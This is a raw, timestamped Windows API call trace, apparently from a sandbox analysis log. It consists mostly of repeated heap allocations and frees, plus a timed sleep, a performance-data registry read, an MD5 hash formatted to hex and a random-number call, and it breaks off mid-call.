[0120.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.809] GetProcessHeap () returned 0xe30000 [0120.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.809] GetProcessHeap () returned 0xe30000 [0120.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.809] GetProcessHeap () returned 0xe30000 [0120.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.809] GetProcessHeap () returned 0xe30000 [0120.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.809] GetProcessHeap () returned 0xe30000 [0120.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.809] GetProcessHeap () returned 0xe30000 [0120.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0120.810] GetProcessHeap () returned 0xe30000 [0120.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0120.811] GetProcessHeap () returned 0xe30000 [0120.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.811] GetProcessHeap () returned 0xe30000 [0120.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.811] GetProcessHeap () returned 0xe30000 [0120.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0120.811] GetProcessHeap () returned 0xe30000 [0120.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0120.811] GetProcessHeap () returned 0xe30000 [0120.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.811] GetProcessHeap () returned 0xe30000 [0120.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.811] GetProcessHeap () returned 0xe30000 [0120.811] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.811] GetProcessHeap () returned 0xe30000 [0120.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.811] GetProcessHeap () returned 0xe30000 [0120.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0120.814] GetProcessHeap () returned 0xe30000 [0120.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0120.814] GetProcessHeap () returned 0xe30000 [0120.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.814] GetProcessHeap () returned 0xe30000 [0120.814] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.832] GetProcessHeap () returned 0xe30000 [0120.832] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.832] GetProcessHeap () returned 0xe30000 [0120.832] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.832] GetProcessHeap () returned 0xe30000 [0120.832] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.832] GetProcessHeap () returned 0xe30000 [0120.832] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.832] GetProcessHeap () returned 0xe30000 [0120.832] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.832] GetProcessHeap () returned 0xe30000 [0120.832] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.832] GetProcessHeap () returned 0xe30000 [0120.832] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.832] GetProcessHeap () returned 0xe30000 [0120.832] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.832] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.833] GetProcessHeap () returned 0xe30000 [0120.833] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.834] GetProcessHeap () returned 0xe30000 [0120.834] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.834] GetProcessHeap () returned 0xe30000 [0120.834] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.834] GetProcessHeap () returned 0xe30000 [0120.834] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.834] GetProcessHeap () returned 0xe30000 [0120.834] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.834] GetProcessHeap () returned 0xe30000 [0120.834] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.834] GetProcessHeap () returned 0xe30000 [0120.834] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.834] GetProcessHeap () returned 0xe30000 [0120.834] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.834] GetProcessHeap () returned 0xe30000 [0120.834] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.834] GetProcessHeap () returned 0xe30000 [0120.834] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.835] GetProcessHeap () returned 0xe30000 [0120.835] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0120.835] GetProcessHeap () returned 0xe30000 [0120.835] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0120.835] GetProcessHeap () returned 0xe30000 [0120.835] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2b430 | out: hHeap=0xe30000) returned 1 [0120.835] GetProcessHeap () returned 0xe30000 [0120.835] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0120.835] Sleep (dwMilliseconds=0xea60) [0130.862] GetTickCount () returned 0x11b73b8 [0130.862] GetProcessHeap () returned 0xe30000 [0130.862] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xecab68 [0130.862] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xecab68, lpcbData=0x2dee40c*=0x2000 | out: lpType=0x0, lpData=0xecab68*=0x50, lpcbData=0x2dee40c*=0x3d8) returned 0x0 [0130.865] GetProcessHeap () returned 0xe30000 [0130.865] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0130.865] GetTickCount () returned 0x11b73b8 [0130.865] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0130.865] GetCurrentProcess () returned 0xffffffff [0130.865] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0130.865] CryptAcquireContextA (in: phProv=0x2dee408, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee408*=0xed54c0) returned 1 [0130.866] CryptCreateHash (in: hProv=0xed54c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2dee40c | out: phHash=0x2dee40c) returned 1 [0130.866] CryptHashData (hHash=0xec21f0, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0130.866] CryptGetHashParam (in: hHash=0xec21f0, dwParam=0x4, pbData=0x2dee404, pdwDataLen=0x2dee400, dwFlags=0x0 | out: pbData=0x2dee404, pdwDataLen=0x2dee400) returned 1 [0130.866] CryptGetHashParam (in: hHash=0xec21f0, dwParam=0x2, pbData=0x2dee428, pdwDataLen=0x2dee404, dwFlags=0x0 | out: pbData=0x2dee428, pdwDataLen=0x2dee404) returned 1 [0130.866] CryptDestroyHash (hHash=0xec21f0) returned 1 [0130.866] CryptReleaseContext (hProv=0xed54c0, dwFlags=0x0) returned 1 [0130.866] GetProcessHeap () returned 0xe30000 [0130.866] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xed4530 [0130.866] wnsprintfA (in: pszDest=0xed4530, cchDest=4, pszFmt="%02x" | out: pszDest="be") returned 2 [0130.866] wnsprintfA (in: pszDest=0xed4532, cchDest=4, pszFmt="%02x" | out: pszDest="69") returned 2 [0130.866] wnsprintfA (in: pszDest=0xed4534, cchDest=4, pszFmt="%02x" | out: pszDest="0a") returned 2 [0130.866] wnsprintfA (in: pszDest=0xed4536, cchDest=4, pszFmt="%02x" | out: pszDest="a0") returned 2 [0130.866] wnsprintfA (in: pszDest=0xed4538, cchDest=4, pszFmt="%02x" | out: pszDest="86") returned 2 [0130.866] wnsprintfA (in: pszDest=0xed453a, cchDest=4, pszFmt="%02x" | out: pszDest="64") returned 2 [0130.866] wnsprintfA (in: pszDest=0xed453c, cchDest=4, pszFmt="%02x" | out: pszDest="a1") returned 2 [0130.866] wnsprintfA (in: pszDest=0xed453e, cchDest=4, pszFmt="%02x" | out: pszDest="17") returned 2 [0130.866] wnsprintfA (in: pszDest=0xed4540, cchDest=4, pszFmt="%02x" | out: pszDest="b3") returned 2 [0130.867] wnsprintfA (in: pszDest=0xed4542, cchDest=4, pszFmt="%02x" | out: pszDest="6e") returned 2 [0130.867] wnsprintfA (in: pszDest=0xed4544, cchDest=4, pszFmt="%02x" | out: pszDest="0e") returned 2 [0130.867] wnsprintfA (in: pszDest=0xed4546, cchDest=4, pszFmt="%02x" | out: pszDest="ad") returned 2 [0130.867] wnsprintfA (in: pszDest=0xed4548, cchDest=4, pszFmt="%02x" | out: pszDest="cd") returned 2 [0130.867] wnsprintfA (in: pszDest=0xed454a, cchDest=4, pszFmt="%02x" | out: pszDest="d3") returned 2 [0130.867] wnsprintfA (in: pszDest=0xed454c, cchDest=4, pszFmt="%02x" | out: pszDest="42") returned 2 [0130.867] wnsprintfA (in: pszDest=0xed454e, cchDest=4, pszFmt="%02x" | out: pszDest="4c") returned 2 [0130.867] CryptAcquireContextW (in: phProv=0x2dee18c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee18c*=0xed5080) returned 1 [0130.867] CryptGenRandom (in: hProv=0xed5080, dwLen=0x80, pbBuffer=0x2dee1a0 | out: pbBuffer=0x2dee1a0) returned 1 [0130.867] CryptReleaseContext (hProv=0xed5080, dwFlags=0x0) returned 1 [0130.867] GetProcessHeap () returned 0xe30000 [0130.867] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2bbc8 [0130.867] GetProcessHeap () returned 0xe30000 [0130.867] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825cc8 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2b430 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x68115c0 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2b430 | out: hHeap=0xe30000) returned 1 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6812060 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xee8818 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825968 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xf0daf8 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x6874278 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2be50 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0xed39f8 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0130.868] GetProcessHeap () returned 0xe30000 [0130.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9fc78 [0130.868] GetProcessHeap () returned 0xe30000 [0130.869] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6811070 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2be50 | out: hHeap=0xe30000) returned 1 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed90d0 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6811070 | out: hHeap=0xe30000) returned 1 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f5f0 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0x6811b10 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9f5f0 | out: hHeap=0xe30000) returned 1 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xef3600 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6811b10 | out: hHeap=0xe30000) returned 1 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.869] GetProcessHeap () returned 0xe30000 [0130.869] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.871] GetProcessHeap () returned 0xe30000 [0130.871] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0130.872] GetProcessHeap () returned 0xe30000 [0130.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, 